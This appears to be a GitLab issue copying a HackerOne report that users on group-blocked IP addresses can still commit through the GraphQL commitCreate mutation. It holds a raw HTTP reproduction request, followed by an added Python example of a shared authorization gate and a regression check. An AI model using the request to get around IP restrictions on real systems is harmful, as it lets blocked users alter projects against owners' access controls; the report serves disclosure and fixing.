Users on banned IP addresses can still commit to projects

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1914049 by js_noob on 2023-03-21, assigned to GitLab Team:


Report

Summary

Hello team, as a part of the grp/project security an owner can block certain IP addresses from accessing that group's resources (projects, ...). However, even if a user is on a blocked IP address, he can still commit to projects.

Steps to reproduce
  1. Create a grp, project and add a maintainer
  2. From the owner navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add the maintainer IP address under Restrict access by IP address
  3. From the maintainer navigate to https://gitlab.com/GRP/PROJECT/-/tree/main and verify the 404
  4. From the maintainer send the following request, but change the variables according to your preferences
POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: YOUR_COOKIES  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/-/graphql-explorer?_gl=1*1mb1g5a*_ga*MjM3Mzk5MDUzLjE2NzczMjcxMTY.*_ga_ENFH3X7M5Y*MTY3ODk4Mzg2Ni40LjEuMTY3ODk4MzkwNi4wLjAuMA..  
Content-Type: application/json  
X-Csrf-Token: xD3r11jgwirOfA6E1GB1pL9ZEuq8lqQCYcrZo4eSO8xbfvb9kmkI5BmsLqWWtgLw894u3hwjqXeGO4LbPJ_cNg  
Content-Length: 489  
Origin: https://gitlab.com  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

{"query":"mutation MyMutation {\n  commitCreate(\n    input: {\n      projectPath: \"test645811/project-1\",\n      branch: \"main\",\n      message: \"This is a Commit\",\n      actions: [\n        {\n          action: UPDATE,\n          filePath: \"README.md\",\n          content: \"This is a test content\",\n          encoding: TEXT\n        }\n      ]\n    }\n  ) {\n    commit {\n      author {\n        name\n      }\n    }\n  }\n}\n","variables":null,"operationName":"MyMutation"}  
  5. Verify the successful response and from the owner verify the creation of the commit
Video/POC

bandicam_2023-03-21_20-40-59-702.mp4

Impact

Users from banned IP addresses can manage to push changes to projects where they should be completely blocked from accessing any project that belongs to that group.
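The class of bug reported here is an authorization check that lives in one code path (the web tree view) but not in another (the GraphQL `commitCreate` mutation). The following is an added illustration, not GitLab's code, of the defensive pattern that prevents it: one authorization gate that every project-touching entry point must call, plus a regression check that calls each entry point as a blocked client and lists the ones that still answer. It models the group restriction as an allowlist of CIDR ranges; the group name, ranges, IPs and endpoint names are constructed sample values.

```python
"""Added example (not GitLab's code): a group IP allowlist enforced through a
single authorization gate, so a GraphQL mutation cannot skip the check."""
import ipaddress
from typing import Callable, Dict, List

# Constructed sample allowlist, in the spirit of a group owner's
# "Restrict access by IP address" setting. Names and ranges are illustrative.
GROUP_IP_ALLOWLIST: Dict[str, List[str]] = {
    "example-group": ["203.0.113.0/24", "198.51.100.7/32"],
}


class AccessDenied(Exception):
    """Raised when the request must be answered as if the resource did not exist."""


def group_of(project_path: str) -> str:
    """'example-group/project-1' -> 'example-group' (top-level namespace)."""
    return project_path.split("/", 1)[0]


def ip_allowed_for_group(group_path: str, client_ip: str) -> bool:
    """True when no allowlist is configured for the group, or the client IP is inside it."""
    ranges = GROUP_IP_ALLOWLIST.get(group_path)
    if not ranges:
        return True
    addr = ipaddress.ip_address(client_ip)
    return any(addr in ipaddress.ip_network(r, strict=False) for r in ranges)


def authorize_project_access(project_path: str, client_ip: str) -> None:
    """The single gate every code path that touches a project must call."""
    if not ip_allowed_for_group(group_of(project_path), client_ip):
        raise AccessDenied(f"{project_path}: {client_ip} is outside the group allowlist")


# --- "before": the web view checks the allowlist, the mutation does not ----------
def web_tree_view(project_path: str, client_ip: str) -> str:
    authorize_project_access(project_path, client_ip)
    return f"tree of {project_path}"


def graphql_commit_create_unpatched(project_path: str, client_ip: str, actions: list) -> dict:
    # Defect modelled on the report: this path never consults the allowlist.
    return {"commit": {"project": project_path, "actions": len(actions)}}


# --- "after": the mutation goes through the same gate as the web view ------------
def graphql_commit_create_patched(project_path: str, client_ip: str, actions: list) -> dict:
    authorize_project_access(project_path, client_ip)
    return {"commit": {"project": project_path, "actions": len(actions)}}


# --- regression check: which entry points still answer a blocked client? ---------
Endpoint = Callable[[str, str], object]


def unprotected_endpoints(endpoints: Dict[str, Endpoint], project_path: str, blocked_ip: str) -> List[str]:
    """Call each endpoint as a blocked client and return the names that did not refuse."""
    leaking: List[str] = []
    for name, fn in endpoints.items():
        try:
            fn(project_path, blocked_ip)
        except AccessDenied:
            continue
        leaking.append(name)
    return leaking


# Constructed commit action, shaped like the mutation input in the report.
ACTIONS = [{"action": "UPDATE", "filePath": "README.md", "content": "test"}]

BEFORE: Dict[str, Endpoint] = {
    "web.tree": web_tree_view,
    "graphql.commitCreate": lambda p, ip: graphql_commit_create_unpatched(p, ip, ACTIONS),
}
AFTER: Dict[str, Endpoint] = {
    "web.tree": web_tree_view,
    "graphql.commitCreate": lambda p, ip: graphql_commit_create_patched(p, ip, ACTIONS),
}

if __name__ == "__main__":
    # 192.0.2.9 is outside the sample allowlist, so it stands in for a blocked client.
    print("before:", unprotected_endpoints(BEFORE, "example-group/project-1", "192.0.2.9"))
    print("after: ", unprotected_endpoints(AFTER, "example-group/project-1", "192.0.2.9"))
```

The `unprotected_endpoints` table is the part worth keeping around after the fix: registering every project-facing entry point (web, REST, GraphQL, git-over-HTTP) in one place and running it against an out-of-range address in CI catches the next code path that forgets the gate.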

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • bandicam_2023-03-21_20-40-59-702.mp4

How To Reproduce

Please add reproducibility information to this section:
